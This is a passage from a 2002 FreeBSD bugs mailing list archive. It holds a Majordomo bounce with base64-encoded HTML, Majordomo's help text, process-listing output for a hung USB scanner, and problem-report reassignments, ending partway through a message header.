YW4gZWFzaWx5IHJldXNlIGFuZCBjdXN0b21pemUuCjwvUD4KPFA+V2hlbiB5b3UgcGxhY2Ug **** Command 'yw4gzwfzawx5ihjldxnligfuzcbjdxn0b21pemuucjwvud4kpfa+v2hlbib5b3ugcgxhy2ug' not recognized. >>>> ZmlsZXMgYW5kIGZvbGRlcnMgaW4gdGhlIFRlbXBsYXRlcyBkaXJlY3Rvcnkgb24gdGhlIERl **** Command 'zmlszxmgyw5kigzvbgrlcnmgaw4gdghlifrlbxbsyxrlcybkaxjly3rvcnkgb24gdghlierl' not recognized. >>>> c2t0b3AsIHlvdSBhcmUgY3VzdG9taXppbmcgd2hhdCB5b3Ugd2lsbCBzZWUgdW5kZXIgdGhl **** Command 'c2t0b3asihlvdsbhcmugy3vzdg9taxppbmcgd2hhdcb5b3ugd2lsbcbzzwugdw5kzxigdghl' not recognized. >>>> IE5ldyBjb21tYW5kIGluIHRoZSBGaWxlIG1lbnUuIFRoZSBuYW1lIG9mIHRoZSBmaWxlcyBv **** Command 'ie5ldybjb21tyw5kigluihrozsbgawxlig1lbnuuifrozsbuyw1lig9mihrozsbmawxlcybv' not recognized. >>>> ciBmb2xkZXJzIHlvdSBwdXQgdGhlcmUgd2lsbCBiZSBkaXNwbGF5ZWQgaW4gdGhlIHN1Ym1l **** Command 'cibmb2xkzxjzihlvdsbwdxqgdghlcmugd2lsbcbizsbkaxnwbgf5zwqgaw4gdghlihn1ym1l' not recognized. >>>> bnUuIFdoZW4geW91IHdhbnQgdG8gY3JlYXRlIGEgY3VzdG9taXplZCBjb3B5IG9mIHRoZSB0 **** Command 'bnuuifdozw4gew91ihdhbnqgdg8gy3jlyxrligegy3vzdg9taxplzcbjb3b5ig9mihrozsb0' not recognized. >>>> ZW1wbGF0ZSwganVzdCBwaWNrIGl0cyBuYW1lIGZyb20gdGhlIG1lbnUuIEEgY29weSBvZiB0 **** Command 'zw1wbgf0zswganvzdcbwawnrigl0cybuyw1ligzyb20gdghlig1lbnuuieegy29wesbvzib0' not recognized. >>>> aGUgZG9jdW1lbnQgb3IgZm9sZGVyIHN0cnVjdHVyZSBpcyBjcmVhdGVkIGZvciB5b3UgdG8g **** Command 'agugzg9jdw1lbnqgb3igzm9szgvyihn0cnvjdhvyzsbpcybjcmvhdgvkigzvcib5b3ugdg8g' not recognized. >>>> Y3VzdG9taXplLiBUaGlzIGlzIHVzZWZ1bCB3aGVuIHlvdSB3YW50IHRvIHJlLWNyZWF0ZSBz **** Command 'y3vzdg9taxpllibuaglziglzihvzzwz1bcb3agvuihlvdsb3yw50ihrvihjllwnyzwf0zsbz' not recognized. >>>> b21lIHNvcnQgb2YgZGlyZWN0b3J5IG9yIGZpbGUgb3JnYW5pemF0aW9uLiBJZiB5b3UgcHV0 **** Command 'b21lihnvcnqgb2ygzglyzwn0b3j5ig9yigzpbgugb3jnyw5pemf0aw9ulibjzib5b3ugchv0' not recognized. >>>> IHBsYWluIGZpbGVzIGluIHRoaXMgZGlyZWN0b3J5LCB5b3UgY2FuIHVzZSB0aG9zZSBmaWxl **** Command 'ihbsywluigzpbgvzigluihroaxmgzglyzwn0b3j5lcb5b3ugy2fuihvzzsb0ag9zzsbmawxl' not recognized. >>>> cyBhcyBhIHN0YXJ0aW5nIHBvaW50IGZvciBuZXcgZG9jdW1lbnRzIHdpdGhvdXQgaGF2aW5n **** Command 'cybhcybhihn0yxj0aw5nihbvaw50igzvcibuzxcgzg9jdw1lbnrzihdpdghvdxqgagf2aw5n' not recognized. >>>> IHRvIHNlYXJjaCBmb3IgdGhlIGRpcmVjdG9yeS48L1A+PFA+PEJSPjwvUD4KPENFTlRFUj4K **** Command 'ihrvihnlyxjjacbmb3igdghligrpcmvjdg9yes48l1a+pfa+pejspjwvud4kpenftlrfuj4k' not recognized. >>>> PFRBQkxFIEJPUkRFUj4KPFRSPgo8VEQ+PEEgSFJFRj0iMDYzLTA2Ny5odG1sIj5QcmV2aW91 **** Command 'pfrbqkxfiejpukrfuj4kpfrspgo8veq+peegsfjfrj0imdyzlta2ny5odg1sij5qcmv2aw91' not recognized. >>>> czwvQT48L1REPgo8VEQ+PEEgSFJFRj0iLi4vZXd0b2MuaHRtbCI+VGFibGUgb2YgQ29udGVu **** Command 'czwvqt48l1repgo8veq+peegsfjfrj0ili4vzxd0b2muahrtbci+vgfibgugb2ygq29udgvu' not recognized. >>>> dHM8L0E+PC9URD4KPFREPjxBIEhSRUY9Ii4uL2NoMDcvMDY5LTA3Mi5odG1sIj5OZXh0PC9B **** Command 'dhm8l0e+pc9urd4kpfrepjxbiehsruy9ii4ul2nomdcvmdy5lta3mi5odg1sij5ozxh0pc9b' not recognized. >>>> PjwvVEQ+CjwvVFI+CjwvVEFCTEU+CjwvQ0VOVEVSPgoKCjwhLS0gYWxsIG9mIHRoZSByZWZl **** Command 'pjwvveq+cjwvvfi+cjwvvefcteu+cjwvq0vovevspgokcjwhls0gywxsig9mihrozsbyzwzl' not recognized. >>>> cmVuY2UgbWF0ZXJpYWxzIChib29rcykgaGF2ZSB0aGUgZm9vdGVyIGFuZCBzdWJmb290IHJl **** Command 'cmvuy2ugbwf0zxjpywxzichib29rcykgagf2zsb0agugzm9vdgvyigfuzcbzdwjmb290ihjl' not recognized. >>>> dmVyZXNlZCAtLT4KPCEtLSByZWZlcmVuY2Vfc3ViZm9vdCA9IGZvb3RlciAtLT4KPCEtLSBy **** Command 'dmvyzxnlzcatlt4kpcetlsbyzwzlcmvuy2vfc3vizm9vdca9igzvb3rlciatlt4kpcetlsby' not recognized. >>>> ZWZlcmVuY2VfZm9vdGVyID0gc3ViZm9vdCAtLT4KCjwhLS0gQkVHSU4gU1VCIEZPT1RFUiAt **** Command 'zwzlcmvuy2vfzm9vdgvyid0gc3vizm9vdcatlt4kcjwhls0gqkvhsu4gu1vciezpt1rfuiat' not recognized. >>>> LT4KCQk8YnI+PGJyPgoJCTwvVEQ+CiAgICA8L1RSPgoJPC9UQUJMRT4KCgkJCgk8dGFibGUg **** Command 'lt4kcqk8yni+pgjypgojctwvveq+ciagica8l1rspgojpc9uqujmrt4kcgkjcgk8dgfibgug' not recognized. >>>> d2lkdGg9IjY0MCIgYm9yZGVyPTAgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPgoJCTx0 **** Command 'd2lkdgg9ijy0mcigym9yzgvyptagy2vsbhbhzgrpbmc9mcbjzwxsc3bhy2luzz0wpgojctx0' not recognized. >>>> cj4KCQk8dGQgYWxpZ249ImxlZnQiIHdpZHRoPTEzNT48aW1nIHNyYz0iLi4vLi4vLi4vLi4v **** Command 'cj4kcqk8dgqgywxpz249imxlznqiihdpzhropteznt48aw1nihnyyz0ili4vli4vli4vli4v' not recognized. >>>> aW1hZ2VzL3doaXRlLmdpZiIgd2lkdGg9MTAwIGhlaWdodD0iMSIgYWx0PSIiIGJvcmRlcj0i **** Command 'aw1hz2vzl3doaxrllmdpziigd2lkdgg9mtawighlawdodd0imsigywx0psiiigjvcmrlcj0i' not recognized. >>>> MCI+PC90ZD4KCQkKCQkKPCEtLSBFTkQgU1VCIEZPT1RFUiAtLT4KCjwhLS0gYWxsIG9mIHRo **** Command 'mci+pc90zd4kcqkkcqkkpcetlsbftkqgu1vciezpt1rfuiatlt4kcjwhls0gywxsig9mihro' not recognized. >>>> ZSBib29rcyBoYXZlIHRoZSBmb290ZXIgYW5kIHN1YmZvb3QgcmV2ZXJlc2VkIC0tPgo8IS0t **** Command 'zsbib29rcyboyxzlihrozsbmb290zxigyw5kihn1ymzvb3qgcmv2zxjlc2vkic0tpgo8is0t' not recognized. >>>> IHJlZmVyZW5jZV9zdWJmb290ID0gZm9vdGVyIC0tPgo8IS0tIHJlZmVyZW5jZV9mb290ZXIg **** Command 'ihjlzmvyzw5jzv9zdwjmb290id0gzm9vdgvyic0tpgo8is0tihjlzmvyzw5jzv9mb290zxig' not recognized. >>>> PSBzdWJmb290IC0tPgoKPCEtLSBGT09URVIgLS0+CgkJCQoJCTx0ZCB3aWR0aD0iNTE1IiBh **** Command 'psbzdwjmb290ic0tpgokpcetlsbgt09urvigls0+cgkjcqojctx0zcb3awr0ad0inte1iibh' not recognized. >>>> bGlnbj0ibGVmdCIgYmdjb2xvcj0iI0ZGRkZGRiI+Cjxmb250IGZhY2U9ImFyaWFsLCBoZWx2 **** Command 'bglnbj0ibgvmdcigymdjb2xvcj0ii0zgrkzgrii+cjxmb250igzhy2u9imfyawfslcbozwx2' not recognized. >>>> ZXRpY2EiIHNpemU9IjEiPjxiPjxhIGhyZWY9Ii4uLy4uLy4uLy4uL3Byb2R1Y3RzLmh0bWwi **** Command 'zxrpy2eiihnpemu9ijeipjxipjxhighyzwy9ii4uly4uly4uly4ul3byb2r1y3rzlmh0bwwi' not recognized. >>>> Pjxmb250IGNvbG9yPSIjMDA2NjY2Ij5Qcm9kdWN0czwvZm9udD48L2E+Jm5ic3A7fCZuYnNw **** Command 'pjxmb250ignvbg9ypsijmda2njy2ij5qcm9kdwn0czwvzm9udd48l2e+jm5ic3a7fczuynnw' not recognized. >>>> OyA8YSBocmVmPSIuLi8uLi8uLi8uLi9jb250YWN0dXMuaHRtbCI+PGZvbnQgY29sb3I9IiMw **** Command 'oya8ysbocmvmpsiuli8uli8uli8uli9jb250ywn0dxmuahrtbci+pgzvbnqgy29sb3i9iimw' not recognized. >>>> MDY2NjYiPkNvbnRhY3QgVXM8L2ZvbnQ+PC9hPiZuYnNwO3wmbmJzcDsgPGEgaHJlZj0iLi4v **** Command 'mdy2njyipknvbnrhy3qgvxm8l2zvbnq+pc9hpizuynnwo3wmbmjzcdsgpgegahjlzj0ili4v' not recognized. >>>> Li4vLi4vLi4vYWJvdXR1cy5odG1sIj48Zm9udCBjb2xvcj0iIzAwNjY2NiI+QWJvdXQgVXM8 **** Command 'li4vli4vli4vywjvdxr1cy5odg1sij48zm9udcbjb2xvcj0iizawnjy2nii+qwjvdxqgvxm8' not recognized. >>>> L2ZvbnQ+PC9hPiZuYnNwO3wmbmJzcDsgPGEgaHJlZj0iLi4vLi4vLi4vLi4vLi4vd3d3LmVh **** Command 'l2zvbnq+pc9hpizuynnwo3wmbmjzcdsgpgegahjlzj0ili4vli4vli4vli4vli4vd3d3lmvh' not recognized. >>>> cnRod2ViLmNvbS9hYm91dF91cy9wcml2YWN5Lmh0bWwiIHRhcmdldD0icmVzb3VyY2Ugd2lu **** Command 'cnrod2vilmnvbs9hym91df91cy9wcml2ywn5lmh0bwwiihrhcmdldd0icmvzb3vyy2ugd2lu' not recognized. >>>> ZG93Ij48Zm9udCBjb2xvcj0iIzAwNjY2NiI+UHJpdmFjeTwvZm9udD48L2E+ICZuYnNwO3wm **** Command 'zg93ij48zm9udcbjb2xvcj0iizawnjy2nii+uhjpdmfjetwvzm9udd48l2e+iczuynnwo3wm' not recognized. >>>> bmJzcDsgPGEgaHJlZj0iLi4vLi4vLi4vLi4vLi4vd3d3Lml0bWFya2V0ZXIuY29tL2RlZmF1 **** Command 'bmjzcdsgpgegahjlzj0ili4vli4vli4vli4vli4vd3d3lml0bwfya2v0zxiuy29tl2rlzmf1' not recognized. >>>> bHQuaHRtIiB0YXJnZXQ9InJlc291cmNlIHdpbmRvdyI+PGZvbnQgY29sb3I9IiMwMDY2NjYi **** Command 'bhquahrtiib0yxjnzxq9injlc291cmnlihdpbmrvdyi+pgzvbnqgy29sb3i9iimwmdy2njyi' not recognized. >>>> PkFkIEluZm88L2ZvbnQ+PC9hPiAmbmJzcDt8Jm5ic3A7IDxhIGhyZWY9Ii4uLy4uLy4uLy4u **** Command 'pkfkieluzm88l2zvbnq+pc9hpiambmjzcdt8jm5ic3a7idxhighyzwy9ii4uly4uly4uly4u' not recognized. >>>> L2RlZmF1bHQuaHRtIj48Zm9udCBjb2xvcj0iIzAwNjY2NiI+SG9tZTwvZm9udD48L2E+PC9i **** Command 'l2rlzmf1bhquahrtij48zm9udcbjb2xvcj0iizawnjy2nii+sg9tztwvzm9udd48l2e+pc9i' not recognized. >>>> PgoJCTxicj48YnI+CgkJCgkJVXNlIG9mIHRoaXMgc2l0ZSBpcyBzdWJqZWN0IHRvIGNlcnRh **** Command 'pgojctxicj48yni+cgkjcgkjvxnlig9mihroaxmgc2l0zsbpcybzdwjqzwn0ihrvignlcnrh' not recognized. >>>> aW4gPGEgaHJlZj0iLi4vLi4vLi4vLi4vYWdyZWVtZW50Lmh0bWwiPlRlcm1zICZhbXA7IENv **** Command 'aw4gpgegahjlzj0ili4vli4vli4vli4vywdyzwvtzw50lmh0bwwiplrlcm1ziczhbxa7ienv' not recognized. >>>> bmRpdGlvbnM8L2E+LCA8YSBocmVmPSIuLi8uLi8uLi8uLi9jb3B5cmlnaHQuaHRtbCI+Q29w **** Command 'bmrpdglvbnm8l2e+lca8ysbocmvmpsiuli8uli8uli8uli9jb3b5cmlnahquahrtbci+q29w' not recognized. >>>> eXJpZ2h0ICZjb3B5OyAxOTk2LTIwMDAgRWFydGhXZWIgSW5jLjwvYT48YnI+IApBbGwgcmln **** Command 'exjpz2h0iczjb3b5oyaxotk2ltiwmdagrwfydghxzwigsw5jljwvyt48yni+iapbbgwgcmln' not recognized. >>>> aHRzIHJlc2VydmVkLiAgUmVwcm9kdWN0aW9uIHdob2xlIG9yIGluIHBhcnQgaW4gYW55IGZv **** Command 'ahrzihjlc2vydmvkliagumvwcm9kdwn0aw9uihdob2xlig9yigluihbhcnqgaw4gyw55igzv' not recognized. >>>> cm0gb3IgbWVkaXVtIHdpdGhvdXQgZXhwcmVzcyB3cml0dGVuIDxhIGhyZWY9Ii4uLy4uLy4u **** Command 'cm0gb3igbwvkaxvtihdpdghvdxqgzxhwcmvzcyb3cml0dgvuidxhighyzwy9ii4uly4uly4u' not recognized. >>>> Ly4uLy4uL2l0bmV3cy5lYXJ0aHdlYi5jb20iIHRhcmdldD0icmVzb3VyY2Ugd2luZG93Ij5w **** Command 'ly4uly4ul2l0bmv3cy5lyxj0ahdlyi5jb20iihrhcmdldd0icmvzb3vyy2ugd2luzg93ij5w' not recognized. >>>> ZXJtaXNzaW9uPC9hPiBvZiBFYXJ0aFdlYiBpcyBwcm9oaWJpdGVkLjwvZm9udD48cD4KPCEt **** Command 'zxjtaxnzaw9upc9hpibvzibfyxj0afdlyibpcybwcm9oawjpdgvkljwvzm9udd48cd4kpcet' not recognized. >>>> LSBuZXRyYW5nZXIgbGluayB0byBzdG9wIHNwaWRlcnMgLS0+CjxhIGhyZWY9IklUS04xYTJi **** Command 'lsbuzxryyw5nzxigbgluayb0bybzdg9wihnwawrlcnmgls0+cjxhighyzwy9iklus04xytji' not recognized. >>>> M2M0ZDVlNmY3ZzhoOWlkZWZjb240Lmh0bWwiPgo8aW1nIHNyYz0iLi4vLi4vLi4vLi4vaW1h **** Command 'm2m0zdvlnmy3zzhoowlkzwzjb240lmh0bwwipgo8aw1nihnyyz0ili4vli4vli4vli4vaw1h' not recognized. >>>> Z2VzL2RvdGNsZWFyLmdpZiIgYm9yZGVyPSIwIiBoZWlnaHQ9IjEiIHdpZHRoPSIxIiBhbGln **** Command 'z2vzl2rvdgnszwfylmdpziigym9yzgvypsiwiibozwlnahq9ijeiihdpzhropsixiibhbgln' not recognized. >>>> bj0ibGVmdCI+PC9hPgo8L3RkPgoJCTwvdHI+CjwvdGFibGU+CjwvQk9EWT4KPC9IVE1MPgoK **** Command 'bj0ibgvmdci+pc9hpgo8l3rkpgojctwvdhi+cjwvdgfibgu+cjwvqk9ewt4kpc9ive1mpgok' not recognized. >>>> PCEtLSBFTkQgRk9PVEVSIC0tPgoK **** Command 'pcetlsbftkqgrk9pvevsic0tpgok' not recognized. >>>> --L4O1M9P3D17-- **** Command '--l4o1m9p3d17--' not recognized. **** No valid commands found. **** A single "subscribe" or "unsubscribe" command **** may appear as the "Subject:" line **** Help for Majordomo@FreeBSD.ORG: *********************************************************************** Majordomo can not process MIME or HTML. Please send only plain ASCII email to Majordomo. Thank you. *********************************************************************** This help message is being sent to you from the Majordomo mailing list management system at Majordomo@FreeBSD.ORG. This is version 1.94.4 of Majordomo. If you're familiar with mail servers, an advanced user's summary of Majordomo's commands appears at the end of this message. Majordomo is an automated system which allows users to subscribe and unsubscribe to mailing lists, and to retrieve files from list archives. You can interact with the Majordomo software by sending it commands in the body of mail messages addressed to "Majordomo@FreeBSD.ORG". Please do not put your commands on the subject line; Majordomo does not process commands in the subject line. You may put multiple Majordomo commands in the same mail message. Put each command on a line by itself. If you use a "signature block" at the end of your mail, Majordomo may mistakenly believe each line of your message is a command; you will then receive spurious error messages. To keep this from happening, either put a line starting with a hyphen ("-") before your signature, or put a line with just the word end on it in the same place. This will stop the Majordomo software from processing your signature as bad commands. Here are some of the things you can do using Majordomo: I. FINDING OUT WHICH LISTS ARE ON THIS SYSTEM To get a list of publicly-available mailing lists on this system, put the following line in the body of your mail message to Majordomo@FreeBSD.ORG: lists Each line will contain the name of a mailing list and a brief description of the list. To get more information about a particular list, use the "info" command, supplying the name of the list. For example, if the name of the list about which you wish information is "demo-list", you would put the line info demo-list in the body of the mail message. II. SUBSCRIBING TO A LIST Once you've determined that you wish to subscribe to one or more lists on this system, you can send commands to Majordomo to have it add you to the list, so you can begin receiving mailings. To receive list mail at the address from which you're sending your mail, simply say "subscribe" followed by the list's name: subscribe demo-list If for some reason you wish to have the mailings go to a different address (a friend's address, a specific other system on which you have an account, or an address which is more correct than the one that automatically appears in the "From:" header on the mail you send), you would add that address to the command. For instance, if you're sending a request from your work account, but wish to receive "demo-list" mail at your personal account (for which we will use "jqpublic@my-isp.com" as an example), you'd put the line subscribe demo-list jqpublic@my-isp.com in the mail message body. Based on configuration decisions made by the list owners, you may be added to the mailing list automatically. You may also receive notification that an authorization key is required for subscription. Another message will be sent to the address to be subscribed (which may or may not be the same as yours) containing the key, and directing the user to send a command found in that message back to Majordomo@FreeBSD.ORG. (This can be a bit of extra hassle, but it helps keep you from being swamped in extra email by someone who forged requests from your address.) You may also get a message that your subscription is being forwarded to the list owner for approval; some lists have waiting lists, or policies about who may subscribe. If your request is forwarded for approval, the list owner should contact you soon after your request. Upon subscribing, you should receive an introductory message, containing list policies and features. Save this message for future reference; it will also contain exact directions for unsubscribing. If you lose the intro mail and would like another copy of the policies, send this message to Majordomo@FreeBSD.ORG: intro demo-list (substituting, of course, the real name of your list for "demo-list"). III. UNSUBSCRIBING FROM MAILING LISTS Your original intro message contains the exact command which should be used to remove your address from the list. However, in most cases, you may simply send the command "unsubscribe" followed by the list name: unsubscribe demo-list (This command may fail if your provider has changed the way your address is shown in your mail.) To remove an address other than the one from which you're sending the request, give that address in the command: unsubscribe demo-list jqpublic@my-isp.com In either of these cases, you can tell Majordomo@FreeBSD.ORG to remove the address in question from all lists on this server by using "*" in place of the list name: unsubscribe * unsubscribe * jqpublic@my-isp.com IV. FINDING THE LISTS TO WHICH AN ADDRESS IS SUBSCRIBED To find the lists to which your address is subscribed, send this command in the body of a mail message to Majordomo@FreeBSD.ORG: which You can look for other addresses, or parts of an address, by specifying the text for which Majordomo should search. For instance, to find which users at my-isp.com are subscribed to which lists, you might send the command which my-isp.com Note that many list owners completely or fully disable the "which" command, considering it a privacy violation. V. FINDING OUT WHO'S SUBSCRIBED TO A LIST To get a list of the addresses on a particular list, you may use the "who" command, followed by the name of the list: who demo-list Note that many list owners allow only a list's subscribers to use the "who" command, or disable it completely, believing it to be a privacy violation. VI. RETRIEVING FILES FROM A LIST'S ARCHIVES Many list owners keep archives of files associated with a list. These may include: - back issues of the list - help files, user profiles, and other documents associated with the list - daily, monthly, or yearly archives for the list To find out if a list has any files associated with it, use the "index" command: index demo-list If you see files in which you're interested, you may retrieve them by using the "get" command and specifying the list name and archive filename. For instance, to retrieve the files called "profile.form" (presumably a form to fill out with your profile) and "demo-list.9611" (presumably the messages posted to the list in November 1996), you would put the lines get demo-list profile.form get demo-list demo-list.9611 in your mail to Majordomo@FreeBSD.ORG. VII. GETTING MORE HELP To contact a human site manager, send mail to postmaster@FreeBSD.ORG. To get another copy of this help message, send mail to Majordomo@FreeBSD.ORG with a line saying help in the message body. VIII. COMMAND SUMMARY FOR ADVANCED USERS In the description below items contained in []'s are optional. When providing the item, do not include the []'s around it. Items in angle brackets, such as
, are meta-symbols that should be replaced by appropriate text without the angle brackets. It understands the following commands: subscribe [
] Subscribe yourself (or
if specified) to the named . unsubscribe [
] Unsubscribe yourself (or
if specified) from the named . "unsubscribe *" will remove you (or
) from all lists. This _may not_ work if you have subscribed using multiple addresses. get Get a file related to . index Return an index of files you can "get" for . which [
] Find out which lists you (or
if specified) are on. who Find out who is on the named . info Retrieve the general introductory information for the named . intro Retrieve the introductory message sent to new users. Non-subscribers may not be able to retrieve this. lists Show the lists served by this Majordomo server. help Retrieve this message. end Stop processing commands (useful if your mailer adds a signature). Commands should be sent in the body of an email message to "Majordomo@FreeBSD.ORG". Multiple commands can be processed provided each occurs on a separate line. Commands in the "Subject:" line are NOT processed. If you have any questions or problems, please contact "Majordomo-Owner@FreeBSD.ORG". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 13:57:45 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C95D37B400; Sat, 24 Aug 2002 13:57:43 -0700 (PDT) Received: from mailout03.sul.t-online.com (mailout03.sul.t-online.com [194.25.134.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id E010243E3B; Sat, 24 Aug 2002 13:57:41 -0700 (PDT) (envelope-from hmg@meier-geinitz.de) Received: from fwd06.sul.t-online.de by mailout03.sul.t-online.com with smtp id 17ihyV-0006Nu-00; Sat, 24 Aug 2002 22:57:39 +0200 Received: from vortex.meier-geinitz.de (520024250054-0001@[217.82.46.199]) by fmrl06.sul.t-online.com with esmtp id 17ihyT-1SJBqqC; Sat, 24 Aug 2002 22:57:37 +0200 Received: from hmg1.meier-geinitz.de ([192.168.0.1] helo=hmg1) by vortex.meier-geinitz.de with esmtp (Exim 3.35 #1 (Debian)) id 17ihyt-0006vm-00; Sat, 24 Aug 2002 22:58:03 +0200 Received: from hmg by hmg1 with local (Exim 3.35 #1 (Debian)) id 17ihys-00009P-00; Sat, 24 Aug 2002 22:58:02 +0200 Date: Sat, 24 Aug 2002 22:58:02 +0200 From: Henning Meier-Geinitz To: Nate Lawson Cc: henning@meier-geinitz.de, freebsd-bugs@FreeBSD.org Subject: Re: kern/41281: USB scanning works only once Message-ID: <20020824205802.GA568@vortex.meier-geinitz.de> References: <200208240035.g7O0ZZ37083097@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200208240035.g7O0ZZ37083097@freefall.freebsd.org> User-Agent: Mutt/1.4i X-Sender: 520024250054-0001@t-dialin.net Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 23, 2002 at 05:35:35PM -0700, Nate Lawson wrote: > Please do "ps axl" from another console after the process has hung and > report. > > http://www.freebsd.org/cgi/query-pr.cgi?pr=41281 ps axlww: UID PID PPID CPU PRI NI VSZ RSS WCHAN STAT TT TIME COMMAND 0 0 0 0 -18 0 0 0 sched DLs ?? 0:00.00 (swapper) 0 1 0 0 10 0 556 324 wait ILs ?? 0:00.00 /sbin/init -- 0 2 0 0 -18 0 0 0 psleep DL ?? 0:00.00 (pagedaemon) 0 3 0 0 18 0 0 0 psleep DL ?? 0:00.00 (vmdaemon) 0 4 0 0 -18 0 0 0 psleep DL ?? 0:00.00 (bufdaemon) 0 5 0 0 18 0 0 0 syncer DL ?? 0:00.01 (syncer) 0 6 0 0 -2 0 0 0 vlruwt DL ?? 0:00.00 (vnlru) 0 70 1 0 2 0 952 660 select Is ?? 0:00.02 /usr/sbin/syslogd -s 0 76 1 0 10 0 212 80 nfsidl I ?? 0:00.00 nfsiod -n 4 0 77 1 120 10 0 212 80 nfsidl I ?? 0:00.00 nfsiod -n 4 0 78 1 120 10 0 212 80 nfsidl I ?? 0:00.00 nfsiod -n 4 0 79 1 120 10 0 212 80 nfsidl I ?? 0:00.00 nfsiod -n 4 0 86 1 120 2 0 1056 688 select Is ?? 0:00.00 /usr/sbin/inetd -wW 0 88 1 0 10 0 1004 716 nanslp Is ?? 0:00.00 /usr/sbin/cron 0 90 1 54 2 0 2644 1872 select Is ?? 0:00.10 /usr/sbin/sshd 0 92 1 0 2 0 924 580 select Is ?? 0:00.00 /usr/sbin/usbd 0 95 1 0 2 0 2752 2196 select Ss ?? 0:00.01 sendmail: accepting connections (sendmail) 25 98 1 114 18 0 2656 2192 pause Is ?? 0:00.00 sendmail: Queue runner@00:30:00 for /var/spool/clientmqueue (sendmail) 0 113 1 114 2 0 920 524 select Is ?? 0:00.00 moused -p /dev/psm0 -t auto 0 123 1 0 10 0 1224 912 wait Is v0 0:00.01 login -p root 0 131 123 0 18 0 1312 948 pause I v0 0:00.02 -csh (csh) 0 140 131 0 10 0 1028 828 wait I v0 0:00.01 bash 0 150 140 0 0 0 868 364 uscnrb I+ v0 0:00.00 ./testusb /dev/uscanner0 0 124 1 0 10 0 1208 904 wait Is v1 0:00.01 login -p root 0 133 124 1 18 0 1308 968 pause S v1 0:00.01 -csh (csh) 0 162 133 1 28 0 428 248 - R+ v1 0:00.00 ps axlww 0 125 1 0 3 0 956 664 ttyin Is+ v2 0:00.00 /usr/libexec/getty Pc ttyv2 0 126 1 0 3 0 956 664 ttyin Is+ v3 0:00.00 /usr/libexec/getty Pc ttyv3 0 127 1 0 3 0 956 664 ttyin Is+ v4 0:00.00 /usr/libexec/getty Pc ttyv4 0 128 1 0 3 0 956 664 ttyin Is+ v5 0:00.00 /usr/libexec/getty Pc ttyv5 0 129 1 0 3 0 956 664 ttyin Is+ v6 0:00.00 /usr/libexec/getty Pc ttyv6 0 130 1 0 3 0 956 664 ttyin Is+ v7 0:00.00 /usr/libexec/getty Pc ttyv7 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 13:59:32 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C2F5937B400; Sat, 24 Aug 2002 13:59:31 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 752D843E84; Sat, 24 Aug 2002 13:59:31 -0700 (PDT) (envelope-from cjc@FreeBSD.org) Received: from freefall.freebsd.org (cjc@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7OKxVJU092862; Sat, 24 Aug 2002 13:59:31 -0700 (PDT) (envelope-from cjc@freefall.freebsd.org) Received: (from cjc@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7OKxVUc092858; Sat, 24 Aug 2002 13:59:31 -0700 (PDT) Date: Sat, 24 Aug 2002 13:59:31 -0700 (PDT) From: "Crist J. Clark" Message-Id: <200208242059.g7OKxVUc092858@freefall.freebsd.org> To: cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: bin/41870: [PATCH] atacontrol reports SMART settings for "security" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] atacontrol reports SMART settings for "security" Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: cjc Responsible-Changed-When: Sat Aug 24 13:59:12 PDT 2002 Responsible-Changed-Why: Over to the ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=41870 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 14: 4: 3 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 71B1F37B400; Sat, 24 Aug 2002 14:04:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2659343E77; Sat, 24 Aug 2002 14:04:02 -0700 (PDT) (envelope-from cjc@FreeBSD.org) Received: from freefall.freebsd.org (cjc@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7OL42JU093405; Sat, 24 Aug 2002 14:04:02 -0700 (PDT) (envelope-from cjc@freefall.freebsd.org) Received: (from cjc@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7OL4280093401; Sat, 24 Aug 2002 14:04:02 -0700 (PDT) Date: Sat, 24 Aug 2002 14:04:02 -0700 (PDT) From: "Crist J. Clark" Message-Id: <200208242104.g7OL4280093401@freefall.freebsd.org> To: cjc@FreeBSD.org, freebsd-bugs@FreeBSD.org, sound@FreeBSD.org Subject: Re: kern/41809: ESS solo cannot be used after suspend Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ESS solo cannot be used after suspend Responsible-Changed-From-To: freebsd-bugs->sound Responsible-Changed-By: cjc Responsible-Changed-When: Sat Aug 24 14:03:31 